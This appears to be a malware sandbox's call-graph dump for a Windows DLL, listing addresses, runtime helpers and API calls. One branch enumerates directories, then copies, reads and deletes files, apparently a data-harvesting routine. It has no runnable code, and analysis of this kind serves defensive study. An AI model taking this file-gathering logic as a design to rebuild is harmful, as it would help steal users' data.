7211->7215 7213 10006368 __dosmaperr 20 API calls 7212->7213 7218 1000a070 7213->7218 7394 1000ada6 7214->7394 7217 10006368 __dosmaperr 20 API calls 7215->7217 7219 1000ae3a 7217->7219 7218->7182 7218->7189 7220 100062ac ___std_exception_copy 26 API calls 7219->7220 7220->7218 7222 10009a2e ___scrt_is_nonwritable_in_current_image 7221->7222 7223 10009a36 7222->7223 7224 10009a4e 7222->7224 7246 10006355 7223->7246 7226 10009aec 7224->7226 7230 10009a83 7224->7230 7228 10006355 __dosmaperr 20 API calls 7226->7228 7231 10009af1 7228->7231 7229 10006368 __dosmaperr 20 API calls 7232 10009a43 _abort 7229->7232 7249 10008c7b RtlEnterCriticalSection 7230->7249 7234 10006368 __dosmaperr 20 API calls 7231->7234 7232->7195 7236 10009af9 7234->7236 7235 10009a89 7237 10009aa5 7235->7237 7238 10009aba 7235->7238 7239 100062ac ___std_exception_copy 26 API calls 7236->7239 7240 10006368 __dosmaperr 20 API calls 7237->7240 7250 10009b0d 7238->7250 7239->7232 7242 10009aaa 7240->7242 7244 10006355 __dosmaperr 20 API calls 7242->7244 7243 10009ab5 7301 10009ae4 7243->7301 7244->7243 7247 10005b7a __dosmaperr 20 API calls 7246->7247 7248 1000635a 7247->7248 7248->7229 7249->7235 7251 10009b34 7250->7251 7252 10009b3b 7250->7252 7255 10002ada _ValidateLocalCookies 5 API calls 7251->7255 7253 10009b5e 7252->7253 7254 10009b3f 7252->7254 7257 10009baf 7253->7257 7258 10009b92 7253->7258 7256 10006355 __dosmaperr 20 API calls 7254->7256 7259 10009d15 7255->7259 7260 10009b44 7256->7260 7262 10009bc5 7257->7262 7304 1000a00b 7257->7304 7261 10006355 __dosmaperr 20 API calls 7258->7261 7259->7243 7263 10006368 __dosmaperr 20 API calls 7260->7263 7265 10009b97 7261->7265 7307 100096b2 7262->7307 7267 10009b4b 7263->7267 7270 10006368 __dosmaperr 20 API calls 7265->7270 7268 100062ac ___std_exception_copy 26 API calls 7267->7268 7268->7251 7273 10009b9f 7270->7273 7271 10009bd3 7274 10009bf9 7271->7274 7279 10009bd7 7271->7279 7272 10009c0c 7276 10009c20 7272->7276 7277 10009c66 WriteFile 7272->7277 7275 100062ac ___std_exception_copy 26 API calls 7273->7275 7319 10009492 GetConsoleCP 7274->7319 7275->7251 7282 10009c56 7276->7282 7283 10009c28 7276->7283 7281 10009c89 GetLastError 7277->7281 7288 10009bef 7277->7288 7278 10009ccd 7278->7251 7290 10006368 __dosmaperr 20 API calls 7278->7290 7279->7278 7314 10009645 7279->7314 7281->7288 7345 10009728 7282->7345 7284 10009c46 7283->7284 7285 10009c2d 7283->7285 7337 100098f5 7284->7337 7285->7278 7330 10009807 7285->7330 7288->7251 7288->7278 7293 10009ca9 7288->7293 7292 10009cf2 7290->7292 7296 10006355 __dosmaperr 20 API calls 7292->7296 7294 10009cb0 7293->7294 7295 10009cc4 7293->7295 7297 10006368 __dosmaperr 20 API calls 7294->7297 7352 10006332 7295->7352 7296->7251 7299 10009cb5 7297->7299 7300 10006355 __dosmaperr 20 API calls 7299->7300 7300->7251 7393 10008c9e RtlLeaveCriticalSection 7301->7393 7303 10009aea 7303->7232 7357 10009f8d 7304->7357 7379 10008dbc 7307->7379 7309 100096c2 7310 100096c7 7309->7310 7311 10005af6 _abort 38 API calls 7309->7311 7310->7271 7310->7272 7312 100096ea 7311->7312 7312->7310 7313 10009708 GetConsoleMode 7312->7313 7313->7310 7317 1000966a 7314->7317 7318 1000969f 7314->7318 7315 1000a181 WriteConsoleW CreateFileW 7315->7317 7316 100096a1 GetLastError 7316->7318 7317->7315 7317->7316 7317->7318 7318->7288 7323 100094f5 7319->7323 7329 10009607 7319->7329 7320 10002ada _ValidateLocalCookies 5 API calls 7321 10009641 7320->7321 7321->7288 7324 1000957b WideCharToMultiByte 7323->7324 7326 100079e6 40 API calls __fassign 7323->7326 7328 100095d2 WriteFile 7323->7328 7323->7329 7388 10007c19 7323->7388 7325 100095a1 WriteFile 7324->7325 7324->7329 7325->7323 7327 1000962a GetLastError 7325->7327 7326->7323 7327->7329 7328->7323 7328->7327 7329->7320 7332 10009816 7330->7332 7331 100098d8 7334 10002ada _ValidateLocalCookies 5 API calls 7331->7334 7332->7331 7333 10009894 WriteFile 7332->7333 7333->7332 7335 100098da GetLastError 7333->7335 7336 100098f1 7334->7336 7335->7331 7336->7288 7344 10009904 7337->7344 7338 10009a0f 7339 10002ada _ValidateLocalCookies 5 API calls 7338->7339 7341 10009a1e 7339->7341 7340 10009986 WideCharToMultiByte 7342 10009a07 GetLastError 7340->7342 7343 100099bb WriteFile 7340->7343 7341->7288 7342->7338 7343->7342 7343->7344 7344->7338 7344->7340 7344->7343 7350 10009737 7345->7350 7346 100097ea 7347 10002ada _ValidateLocalCookies 5 API calls 7346->7347 7349 10009803 7347->7349 7348 100097a9 WriteFile 7348->7350 7351 100097ec GetLastError 7348->7351 7349->7288 7350->7346 7350->7348 7351->7346 7353 10006355 __dosmaperr 20 API calls 7352->7353 7354 1000633d __dosmaperr 7353->7354 7355 10006368 __dosmaperr 20 API calls 7354->7355 7356 10006350 7355->7356 7356->7251 7366 10008d52 7357->7366 7359 10009f9f 7360 10009fa7 7359->7360 7361 10009fb8 SetFilePointerEx 7359->7361 7362 10006368 __dosmaperr 20 API calls 7360->7362 7363 10009fd0 GetLastError 7361->7363 7364 10009fac 7361->7364 7362->7364 7365 10006332 __dosmaperr 20 API calls 7363->7365 7364->7262 7365->7364 7367 10008d74 7366->7367 7368 10008d5f 7366->7368 7371 10006355 __dosmaperr 20 API calls 7367->7371 7373 10008d99 7367->7373 7369 10006355 __dosmaperr 20 API calls 7368->7369 7370 10008d64 7369->7370 7372 10006368 __dosmaperr 20 API calls 7370->7372 7374 10008da4 7371->7374 7375 10008d6c 7372->7375 7373->7359 7376 10006368 __dosmaperr 20 API calls 7374->7376 7375->7359 7377 10008dac 7376->7377 7378 100062ac ___std_exception_copy 26 API calls 7377->7378 7378->7375 7380 10008dd6 7379->7380 7381 10008dc9 7379->7381 7383 10008de2 7380->7383 7384 10006368 __dosmaperr 20 API calls 7380->7384 7382 10006368 __dosmaperr 20 API calls 7381->7382 7385 10008dce 7382->7385 7383->7309 7386 10008e03 7384->7386 7385->7309 7387 100062ac ___std_exception_copy 26 API calls 7386->7387 7387->7385 7389 10005af6 _abort 38 API calls 7388->7389 7390 10007c24 7389->7390 7391 10007a00 __fassign 38 API calls 7390->7391 7392 10007c34 7391->7392 7392->7323 7393->7303 7397 1000ad24 7394->7397 7396 1000adca 7396->7218 7398 1000ad30 ___scrt_is_nonwritable_in_current_image 7397->7398 7408 10008c7b RtlEnterCriticalSection 7398->7408 7400 1000ad3e 7401 1000ad70 7400->7401 7402 1000ad65 7400->7402 7404 10006368 __dosmaperr 20 API calls 7401->7404 7409 1000ae4d 7402->7409 7405 1000ad6b 7404->7405 7424 1000ad9a 7405->7424 7407 1000ad8d _abort 7407->7396 7408->7400 7410 10008d52 26 API calls 7409->7410 7412 1000ae5d 7410->7412 7411 1000ae63 7427 10008cc1 7411->7427 7412->7411 7414 1000ae95 7412->7414 7417 10008d52 26 API calls 7412->7417 7414->7411 7415 10008d52 26 API calls 7414->7415 7418 1000aea1 CloseHandle 7415->7418 7420 1000ae8c 7417->7420 7418->7411 7422 1000aead GetLastError 7418->7422 7419 1000aedd 7419->7405 7421 10008d52 26 API calls 7420->7421 7421->7414 7422->7411 7423 10006332 __dosmaperr 20 API calls 7423->7419 7436 10008c9e RtlLeaveCriticalSection 7424->7436 7426 1000ada4 7426->7407 7428 10008cd0 7427->7428 7429 10008d37 7427->7429 7428->7429 7434 10008cfa 7428->7434 7430 10006368 __dosmaperr 20 API calls 7429->7430 7431 10008d3c 7430->7431 7432 10006355 __dosmaperr 20 API calls 7431->7432 7433 10008d27 7432->7433 7433->7419 7433->7423 7434->7433 7435 10008d21 SetStdHandle 7434->7435 7435->7433 7436->7426 7437->7192 7438->7172 7439 10002049 7440 10002055 ___scrt_is_nonwritable_in_current_image 7439->7440 7441 100020d3 7440->7441 7442 1000207d 7440->7442 7452 1000205e 7440->7452 7443 10002639 ___scrt_fastfail 4 API calls 7441->7443 7453 1000244c 7442->7453 7445 100020da 7443->7445 7446 10002082 7462 10002308 7446->7462 7448 10002087 __RTC_Initialize 7465 100020c4 7448->7465 7450 1000209f 7468 1000260b 7450->7468 7454 10002451 ___scrt_release_startup_lock 7453->7454 7455 10002461 7454->7455 7456 10002455 7454->7456 7459 1000246e 7455->7459 7460 1000499b _abort 28 API calls 7455->7460 7457 1000527a _abort 20 API calls 7456->7457 7458 1000245f 7457->7458 7458->7446 7459->7446 7461 10004bbd 7460->7461 7461->7446 7474 100034c7 RtlInterlockedFlushSList 7462->7474 7464 10002312 7464->7448 7476 1000246f 7465->7476 7467 100020c9 ___scrt_release_startup_lock 7467->7450 7469 10002617 7468->7469 7470 1000262d 7469->7470 7484 100053ed 7469->7484 7470->7452 7473 10003529 ___vcrt_uninitialize 8 API calls 7473->7470 7475 100034d7 7474->7475 7475->7464 7481 100053ff 7476->7481 7479 1000391b ___vcrt_uninitialize_ptd 6 API calls 7480 1000354d 7479->7480 7480->7467 7482 10005c2b 11 API calls 7481->7482 7483 10002476 7482->7483 7483->7479 7487 100074da 7484->7487 7490 100074f3 7487->7490 7488 10002ada _ValidateLocalCookies 5 API calls 7489 10002625 7488->7489 7489->7473 7490->7488 7624 10008a89 7627 10006d60 7624->7627 7628 10006d69 7627->7628 7629 10006d72 7627->7629 7630 10006c5f 51 API calls 7628->7630 7630->7629 6799 1000220c 6800 10002215 6799->6800 6801 1000221a dllmain_dispatch 6799->6801 6803 100022b1 6800->6803 6804 100022c7 6803->6804 6806 100022d0 6804->6806 6807 10002264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6804->6807 6806->6801 6807->6806 7491 1000724e GetProcessHeap 7492 1000284f 7493 10002882 std::exception::exception 27 API calls 7492->7493 7494 1000285d 7493->7494 7635 10003c90 RtlUnwind 7733 100036d0 7734 100036e2 7733->7734 7736 100036f0 @_EH4_CallFilterFunc@8 7733->7736 7735 10002ada _ValidateLocalCookies 5 API calls 7734->7735 7735->7736 7495 10005351 7496 10005360 7495->7496 7497 10005374 7495->7497 7496->7497 7500 1000571e _free 20 API calls 7496->7500 7498 1000571e _free 20 API calls 7497->7498 7499 10005386 7498->7499 7501 1000571e _free 20 API calls 7499->7501 7500->7497 7502 10005399 7501->7502 7503 1000571e _free 20 API calls 7502->7503 7504 100053aa 7503->7504 7505 1000571e _free 20 API calls 7504->7505 7506 100053bb 7505->7506 7737 100073d5 7738 100073e1 ___scrt_is_nonwritable_in_current_image 7737->7738 7749 10005671 RtlEnterCriticalSection 7738->7749 7740 100073e8 7741 10008be3 27 API calls 7740->7741 7742 100073f7 7741->7742 7747 10007406 7742->7747 7750 10007269 GetStartupInfoW 7742->7750 7761 10007422 7747->7761 7748 10007417 _abort 7749->7740 7751 10007286 7750->7751 7752 10007318 7750->7752 7751->7752 7753 10008be3 27 API calls 7751->7753 7756 1000731f 7752->7756 7754 100072af 7753->7754 7754->7752 7755 100072dd GetFileType 7754->7755 7755->7754 7758 10007326 7756->7758 7757 10007369 GetStdHandle 7757->7758 7758->7757 7759 100073d1 7758->7759 7760 1000737c GetFileType 7758->7760 7759->7747 7760->7758 7764 100056b9 RtlLeaveCriticalSection 7761->7764 7763 10007429 7763->7748 7764->7763 7765 10004ed7 7766 10006d60 51 API calls 7765->7766 7767 10004ee9 7766->7767 7776 10007153 GetEnvironmentStringsW 7767->7776 7770 10004ef4 7772 1000571e _free 20 API calls 7770->7772 7773 10004f29 7772->7773 7774 10004eff 7775 1000571e _free 20 API calls 7774->7775 7775->7770 7777 1000716a 7776->7777 7787 100071bd 7776->7787 7778 10007170 WideCharToMultiByte 7777->7778 7781 1000718c 7778->7781 7778->7787 7779 100071c6 FreeEnvironmentStringsW 7780 10004eee 7779->7780 7780->7770 7788 10004f2f 7780->7788 7782 100056d0 21 API calls 7781->7782 7783 10007192 7782->7783 7784 100071af 7783->7784 7785 10007199 WideCharToMultiByte 7783->7785 7786 1000571e _free 20 API calls 7784->7786 7785->7784 7786->7787 7787->7779 7787->7780 7789 10004f44 7788->7789 7790 1000637b _abort 20 API calls 7789->7790 7792 10004f6b 7790->7792 7791 1000571e _free 20 API calls 7794 10004fe9 7791->7794 7793 10004fcf 7792->7793 7795 1000637b _abort 20 API calls 7792->7795 7796 10004fd1 7792->7796 7797 1000544d ___std_exception_copy 26 API calls 7792->7797 7800 10004ff3 7792->7800 7803 1000571e _free 20 API calls 7792->7803 7793->7791 7794->7774 7795->7792 7798 10005000 20 API calls 7796->7798 7797->7792 7799 10004fd7 7798->7799 7801 1000571e _free 20 API calls 7799->7801 7802 100062bc ___std_exception_copy 11 API calls 7800->7802 7801->7793 7804 10004fff 7802->7804 7803->7792 6975 10002418 6976 10002420 ___scrt_release_startup_lock 6975->6976 6979 100047f5 6976->6979 6978 10002448 6980 10004804 6979->6980 6981 10004808 6979->6981 6980->6978 6984 10004815 6981->6984 6985 10005b7a __dosmaperr 20 API calls 6984->6985 6988 1000482c 6985->6988 6986 10002ada _ValidateLocalCookies 5 API calls 6987 10004811 6986->6987 6987->6978 6988->6986 7636 10004a9a 7639 10005411 7636->7639 7640 1000541d _abort 7639->7640 7641 10005af6 _abort 38 API calls 7640->7641 7644 10005422 7641->7644 7642 100055a8 _abort 38 API calls 7643 1000544c 7642->7643 7644->7642 6501 10001c5b 6502 10001c6b ___scrt_fastfail 6501->6502 6505 100012ee 6502->6505 6504 10001c87 6506 10001324 ___scrt_fastfail 6505->6506 6507 100013b7 GetEnvironmentVariableW 6506->6507 6531 100010f1 6507->6531 6510 100010f1 57 API calls 6511 10001465 6510->6511 6512 100010f1 57 API calls 6511->6512 6513 10001479 6512->6513 6514 100010f1 57 API calls 6513->6514 6515 1000148d 6514->6515 6516 100010f1 57 API calls 6515->6516 6517 100014a1 6516->6517 6518 100010f1 57 API calls 6517->6518 6519 100014b5 lstrlenW 6518->6519 6520 100014d2 6519->6520 6521 100014d9 lstrlenW 6519->6521 6520->6504 6522 100010f1 57 API calls 6521->6522 6523 10001501 lstrlenW lstrcatW 6522->6523 6524 100010f1 57 API calls 6523->6524 6525 10001539 lstrlenW lstrcatW 6524->6525 6526 100010f1 57 API calls 6525->6526 6527 1000156b lstrlenW lstrcatW 6526->6527 6528 100010f1 57 API calls 6527->6528 6529 1000159d lstrlenW lstrcatW 6528->6529 6530 100010f1 57 API calls 6529->6530 6530->6520 6532 10001118 ___scrt_fastfail 6531->6532 6533 10001129 lstrlenW 6532->6533 6544 10002c40 6533->6544 6535 10001148 lstrcatW lstrlenW 6536 10001177 lstrlenW FindFirstFileW 6535->6536 6537 10001168 lstrlenW 6535->6537 6538 100011a0 6536->6538 6539 100011e1 6536->6539 6537->6536 6540 100011c7 FindNextFileW 6538->6540 6543 100011aa 6538->6543 6539->6510 6540->6538 6541 100011da FindClose 6540->6541 6541->6539 6543->6540 6546 10001000 6543->6546 6545 10002c57 6544->6545 6545->6535 6545->6545 6547 10001022 ___scrt_fastfail 6546->6547 6548 100010af 6547->6548 6549 1000102f lstrcatW lstrlenW 6547->6549 6552 100010b5 lstrlenW 6548->6552 6562 100010ad 6548->6562 6550 1000105a lstrlenW 6549->6550 6551 1000106b lstrlenW 6549->6551 6550->6551 6563 10001e89 lstrlenW 6551->6563 6577 10001e16 6552->6577 6555 10001088 GetFileAttributesW 6558 1000109c 6555->6558 6555->6562 6556 100010ca 6557 10001e89 5 API calls 6556->6557 6556->6562 6559 100010df 6557->6559 6558->6562 6569 1000173a 6558->6569 6582 100011ea 6559->6582 6562->6543 6564 10002c40 ___scrt_fastfail 6563->6564 6565 10001ea7 lstrcatW lstrlenW 6564->6565 6566 10001ed1 lstrcatW 6565->6566 6567 10001ec2 6565->6567 6566->6555 6567->6566 6568 10001ec7 lstrlenW 6567->6568 6568->6566 6570 10001747 ___scrt_fastfail 6569->6570 6597 10001cca 6570->6597 6574 1000199f 6574->6562 6575 10001824 ___scrt_fastfail _strlen 6575->6574 6617 100015da 6575->6617 6578 10001e29 6577->6578 6581 10001e4c 6577->6581 6579 10001e2d lstrlenW 6578->6579 6578->6581 6580 10001e3f lstrlenW 6579->6580 6579->6581 6580->6581 6581->6556 6583 1000120e ___scrt_fastfail 6582->6583 6584 10001e89 5 API calls 6583->6584 6585 10001220 GetFileAttributesW 6584->6585 6586 10001235 6585->6586 6587 10001246 6585->6587 6586->6587 6589 1000173a 35 API calls 6586->6589 6588 10001e89 5 API calls 6587->6588 6590 10001258 6588->6590 6589->6587 6591 100010f1 56 API calls 6590->6591 6592 1000126d 6591->6592 6593 10001e89 5 API calls 6592->6593 6594 1000127f ___scrt_fastfail 6593->6594 6595 100010f1 56 API calls 6594->6595 6596 100012e6 6595->6596 6596->6562 6598 10001cf1 ___scrt_fastfail 6597->6598 6599 10001d0f CopyFileW CreateFileW 6598->6599 6600 10001d44 DeleteFileW 6599->6600 6601 10001d55 GetFileSize 6599->6601 6606 10001808 6600->6606 6602 10001ede 22 API calls 6601->6602 6603 10001d66 ReadFile 6602->6603 6604 10001d94 CloseHandle DeleteFileW 6603->6604 6605 10001d7d CloseHandle DeleteFileW 6603->6605 6604->6606 6605->6606 6606->6574 6607 10001ede 6606->6607 6609 1000222f 6607->6609 6610 1000224e 6609->6610 6611 1000474f _abort 7 API calls 6609->6611 6613 10002250 6609->6613 6625 100047e5 6609->6625 6610->6575 6611->6609 6612 10002908 6614 100035d2 __CxxThrowException@8 RaiseException 6612->6614 6613->6612 6632 100035d2 6613->6632 6615 10002925 6614->6615 6615->6575 6618 1000160c _strcat _strlen 6617->6618 6619 1000163c lstrlenW 6618->6619 6635 10001c9d 6619->6635 6621 10001655 lstrcatW lstrlenW 6622 10001678 6621->6622 6623 10001693 ___scrt_fastfail 6622->6623 6624 1000167e lstrcatW 6622->6624 6623->6575 6624->6623 6630 100056d0 _abort 6625->6630 6626 1000570e 6627 10006368 __dosmaperr 20 API calls 6626->6627 6629 1000570c 6627->6629 6628 100056f9 RtlAllocateHeap 6628->6629 6628->6630 6629->6609 6630->6626 6630->6628 6631 1000474f _abort 7 API calls 6630->6631 6631->6630 6634 100035f2 RaiseException 6632->6634 6634->6612 6636 10001ca6 _strlen 6635->6636 6636->6621 6637 100020db 6640 100020e7 ___scrt_is_nonwritable_in_current_image 6637->6640 6638 100020f6 6639 10002110 dllmain_raw 6639->6638 6641 1000212a 6639->6641 6640->6638 6640->6639 6645 1000210b 6640->6645 6650 10001eec 6641->6650 6643 10002177 6643->6638 6644 10001eec 31 API calls 6643->6644 6646 1000218a 6644->6646 6645->6638 6645->6643 6648 10001eec 31 API calls 6645->6648 6646->6638 6647 10002193 dllmain_raw 6646->6647 6647->6638 6649 1000216d dllmain_raw 6648->6649 6649->6643 6651 10001ef7 6650->6651 6652 10001f2a dllmain_crt_process_detach 6650->6652 6653 10001f1c dllmain_crt_process_attach 6651->6653 6654 10001efc 6651->6654 6659 10001f06 6652->6659 6653->6659 6655 10001f01 6654->6655 6656 10001f12 6654->6656 6655->6659 6660 1000240b 6655->6660 6665 100023ec 6656->6665 6659->6645 6673 100053e5 6660->6673 6781 10003513 6665->6781 6668 100023f5 6668->6659 6671 10002408 6671->6659 6672 1000351e 7 API calls 6672->6668 6679 10005aca 6673->6679 6676 1000351e 6751 10003820 6676->6751 6678 10002415 6678->6659 6680 10005ad4 6679->6680 6681 10002410 6679->6681 6682 10005e08 _abort 11 API calls 6680->6682 6681->6676 6683 10005adb 6682->6683 6683->6681 6684 10005e5e _abort 11 API calls 6683->6684 6685 10005aee 6684->6685 6687 100059b5 6685->6687 6688 100059c0 6687->6688 6692 100059d0 6687->6692 6693 100059d6 6688->6693 6691 1000571e _free 20 API calls 6691->6692 6692->6681 6694 100059e9 6693->6694 6697 100059ef 6693->6697 6695 1000571e _free 20 API calls 6694->6695 6695->6697 6696 1000571e _free 20 API calls 6698 100059fb 6696->6698 6697->6696 6699 1000571e _free 20 API calls 6698->6699 6700 10005a06 6699->6700 6701 1000571e _free 20 API calls 6700->6701 6702 10005a11 6701->6702 6703 1000571e _free 20 API calls 6702->6703 6704 10005a1c 6703->6704 6705 1000571e _free 20 API calls 6704->6705 6706 10005a27 6705->6706 6707 1000571e _free 20 API calls 6706->6707 6708 10005a32 6707->6708 6709 1000571e _free 20 API calls 6708->6709 6710 10005a3d 6709->6710 6711 1000571e _free 20 API calls 6710->6711 6712 10005a48 6711->6712 6713 1000571e _free 20 API calls 6712->6713 6714 10005a56 6713->6714 6719 1000589c 6714->6719 6725 100057a8 6719->6725 6721 100058c0 6722 100058ec 6721->6722 6738 10005809 6722->6738 6724 10005910 6724->6691 6726 100057b4 ___scrt_is_nonwritable_in_current_image 6725->6726 6733 10005671 RtlEnterCriticalSection 6726->6733 6729 100057be 6730 1000571e _free 20 API calls 6729->6730 6731 100057e8 6729->6731 6730->6731 6734 100057fd 6731->6734 6732 100057f5 _abort 6732->6721 6733->6729 6737 100056b9 RtlLeaveCriticalSection 6734->6737 6736 10005807 6736->6732 6737->6736 6739 10005815 ___scrt_is_nonwritable_in_current_image 6738->6739 6746 10005671 RtlEnterCriticalSection 6739->6746 6741 1000581f 6742 10005a7f _abort 20 API calls 6741->6742 6743 10005832 6742->6743 6747 10005848 6743->6747 6745 10005840 _abort 6745->6724 6746->6741 6750 100056b9 RtlLeaveCriticalSection 6747->6750 6749 10005852 6749->6745 6750->6749 6752 1000384b ___vcrt_freefls@4 6751->6752 6754 1000382d 6751->6754 6752->6678 6753 1000383b 6762 10003ba2 6753->6762 6754->6753 6757 10003b67 6754->6757 6767 10003a82 6757->6767 6759 10003b81 6760 10003b99 TlsGetValue 6759->6760 6761 10003b8d 6759->6761 6760->6761 6761->6753 6763 10003a82 try_get_function 5 API calls 6762->6763 6764 10003bbc 6763->6764 6765 10003bd7 TlsSetValue 6764->6765 6766 10003bcb 6764->6766 6765->6766 6766->6752 6768 10003aaa 6767->6768 6773 10003aa6 __crt_fast_encode_pointer 6767->6773 6768->6773 6774 100039be 6768->6774 6771 10003ac4 GetProcAddress 6772 10003ad4 __crt_fast_encode_pointer 6771->6772 6771->6773 6772->6773 6773->6759 6779 100039cd try_get_first_available_module 6774->6779 6775 10003a77 6775->6771 6775->6773 6776 100039ea LoadLibraryExW 6777 10003a05 GetLastError 6776->6777 6776->6779 6777->6779 6778 10003a60 FreeLibrary 6778->6779 6779->6775 6779->6776 6779->6778 6780 10003a38 LoadLibraryExW 6779->6780 6780->6779 6787 10003856 6781->6787 6783 100023f1 6783->6668 6784 100053da 6783->6784 6785 10005b7a __dosmaperr 20 API calls 6784->6785 6786 100023fd 6785->6786 6786->6671 6786->6672 6788 10003862 GetLastError 6787->6788 6789 1000385f 6787->6789 6790 10003b67 ___vcrt_FlsGetValue 6 API calls 6788->6790 6789->6783 6791 10003877 6790->6791 6792 100038dc SetLastError 6791->6792 6793 10003ba2 ___vcrt_FlsSetValue 6 API calls 6791->6793 6798 10003896 6791->6798 6792->6783 6794 10003890 6793->6794 6795 100038b8 6794->6795 6796 10003ba2 ___vcrt_FlsSetValue 6 API calls 6794->6796 6794->6798 6797 10003ba2 ___vcrt_FlsSetValue 6 API calls 6795->6797 6795->6798 6796->6795 6797->6798 6798->6792 6989 1000281c 6992 10002882 6989->6992 6995 10003550 6992->6995 6994 1000282a 6996 1000358a 6995->6996 6997 1000355d 6995->6997 6996->6994 6997->6996 6998 100047e5 ___std_exception_copy 21 API calls 6997->6998 6999 1000357a 6998->6999 6999->6996 7001 1000544d 6999->7001 7002 1000545a 7001->7002 7004 10005468 7001->7004 7002->7004 7008 1000547f 7002->7008 7003 10006368 __dosmaperr 20 API calls 7005 10005470 7003->7005 7004->7003 7006 100062ac ___std_exception_copy 26 API calls 7005->7006 7007 1000547a 7006->7007 7007->6996 7008->7007 7009 10006368 __dosmaperr 20 API calls 7008->7009 7009->7005 7805 10004bdd 7806 10004c08 7805->7806 7807 10004bec 7805->7807 7809 10006d60 51 API calls 7806->7809 7807->7806 7808 10004bf2 7807->7808 7810 10006368 __dosmaperr 20 API calls 7808->7810 7811 10004c0f GetModuleFileNameA 7809->7811 7812 10004bf7 7810->7812 7813 10004c33 7811->7813 7814 100062ac ___std_exception_copy 26 API calls 7812->7814 7828 10004d01 7813->7828 7815 10004c01 7814->7815 7820 10004c72 7823 10004d01 38 API calls 7820->7823 7821 10004c66 7822 10006368 __dosmaperr 20 API calls 7821->7822 7827 10004c6b 7822->7827 7825 10004c88 7823->7825 7824 1000571e _free 20 API calls 7824->7815 7826 1000571e _free 20 API calls 7825->7826 7825->7827 7826->7827 7827->7824 7830 10004d26 7828->7830 7832 10004d86 7830->7832 7840 100070eb 7830->7840 7831 10004c50 7834 10004e76 7831->7834 7832->7831 7833 100070eb 38 API calls 7832->7833 7833->7832 7835 10004e8b 7834->7835 7836 10004c5d 7834->7836 7835->7836 7837 1000637b _abort 20 API calls 7835->7837 7836->7820 7836->7821 7838 10004eb9 7837->7838 7839 1000571e _free 20 API calls 7838->7839 7839->7836 7843 10007092 7840->7843 7844 100054a7 __fassign 38 API calls 7843->7844 7845 100070a6 7844->7845 7845->7830 5824 10006d60 5825 10006d69 5824->5825 5826 10006d72 5824->5826 5828 10006c5f 5825->5828 5848 10005af6 GetLastError 5828->5848 5830 10006c6c 5868 10006d7e 5830->5868 5832 10006c74 5877 100069f3 5832->5877 5835 10006c8b 5835->5826 5838 10006cce 5904 1000571e 5838->5904 5842 10006cc9 5901 10006368 5842->5901 5844 10006d12 5844->5838 5910 100068c9 5844->5910 5845 10006ce6 5845->5844 5846 1000571e _free 20 API calls 5845->5846 5846->5844 5849 10005b12 5848->5849 5850 10005b0c 5848->5850 5854 10005b61 SetLastError 5849->5854 5920 1000637b 5849->5920 5913 10005e08 5850->5913 5854->5830 5855 10005b2c 5857 1000571e _free 20 API calls 5855->5857 5859 10005b32 5857->5859 5861 10005b6d SetLastError 5859->5861 5860 10005b48 5934 1000593c 5860->5934 5939 100055a8 5861->5939 5865 1000571e _free 20 API calls 5867 10005b5a 5865->5867 5867->5854 5867->5861 5869 10006d8a ___scrt_is_nonwritable_in_current_image 5868->5869 5870 10005af6 _abort 38 API calls 5869->5870 5872 10006d94 5870->5872 5873 10006e18 _abort 5872->5873 5874 100055a8 _abort 38 API calls 5872->5874 5876 1000571e _free 20 API calls 5872->5876 6318 10005671 RtlEnterCriticalSection 5872->6318 6319 10006e0f 5872->6319 5873->5832 5874->5872 5876->5872 6323 100054a7 5877->6323 5880 10006a14 GetOEMCP 5883 10006a3d 5880->5883 5881 10006a26 5882 10006a2b GetACP 5881->5882 5881->5883 5882->5883 5883->5835 5884 100056d0 5883->5884 5885 1000570e 5884->5885 5889 100056de _abort 5884->5889 5886 10006368 __dosmaperr 20 API calls 5885->5886 5888 1000570c 5886->5888 5887 100056f9 RtlAllocateHeap 5887->5888 5887->5889 5888->5838 5891 10006e20 5888->5891 5889->5885 5889->5887 5890 1000474f _abort 7 API calls 5889->5890 5890->5889 5892 100069f3 40 API calls 5891->5892 5893 10006e3f 5892->5893 5896 10006e90 IsValidCodePage 5893->5896 5898 10006e46 5893->5898 5900 10006eb5 ___scrt_fastfail 5893->5900 5894 10002ada _ValidateLocalCookies 5 API calls 5895 10006cc1 5894->5895 5895->5842 5895->5845 5897 10006ea2 GetCPInfo 5896->5897 5896->5898 5897->5898 5897->5900 5898->5894 6360 10006acb GetCPInfo 5900->6360 5902 10005b7a __dosmaperr 20 API calls 5901->5902 5903 1000636d 5902->5903 5903->5838 5905 10005752 __dosmaperr 5904->5905 5906 10005729 HeapFree 5904->5906 5905->5835 5906->5905 5907 1000573e 5906->5907 5908 10006368 __dosmaperr 18 API calls 5907->5908 5909 10005744 GetLastError 5908->5909 5909->5905 6433 10006886 5910->6433 5912 100068ed 5912->5838 5950 10005c45 5913->5950 5916 10005e47 TlsGetValue 5917 10005e3b 5916->5917 5957 10002ada 5917->5957 5919 10005e58 5919->5849 5925 10006388 _abort 5920->5925 5921 100063c8 5924 10006368 __dosmaperr 19 API calls 5921->5924 5922 100063b3 RtlAllocateHeap 5923 10005b24 5922->5923 5922->5925 5923->5855 5927 10005e5e 5923->5927 5924->5923 5925->5921 5925->5922 5972 1000474f 5925->5972 5928 10005c45 _abort 5 API calls 5927->5928 5929 10005e85 5928->5929 5930 10005ea0 TlsSetValue 5929->5930 5931 10005e94 5929->5931 5930->5931 5932 10002ada _ValidateLocalCookies 5 API calls 5931->5932 5933 10005b41 5932->5933 5933->5855 5933->5860 5988 10005914 5934->5988 6136 10007613 5939->6136 5942 100055b8 5944 100055c2 IsProcessorFeaturePresent 5942->5944 5949 100055e0 5942->5949 5946 100055cd 5944->5946 6166 100060e2 5946->6166 6172 10004bc1 5949->6172 5951 10005c71 5950->5951 5952 10005c75 5950->5952 5951->5952 5953 10005c95 5951->5953 5964 10005ce1 5951->5964 5952->5916 5952->5917 5953->5952 5955 10005ca1 GetProcAddress 5953->5955 5956 10005cb1 __crt_fast_encode_pointer 5955->5956 5956->5952 5958 10002ae3 5957->5958 5959 10002ae5 IsProcessorFeaturePresent 5957->5959 5958->5919 5961 10002b58 5959->5961 5971 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5961->5971 5963 10002c3b 5963->5919 5965 10005d02 LoadLibraryExW 5964->5965 5969 10005cf7 5964->5969 5966 10005d37 5965->5966 5967 10005d1f GetLastError 5965->5967 5966->5969 5970 10005d4e FreeLibrary 5966->5970 5967->5966 5968 10005d2a LoadLibraryExW 5967->5968 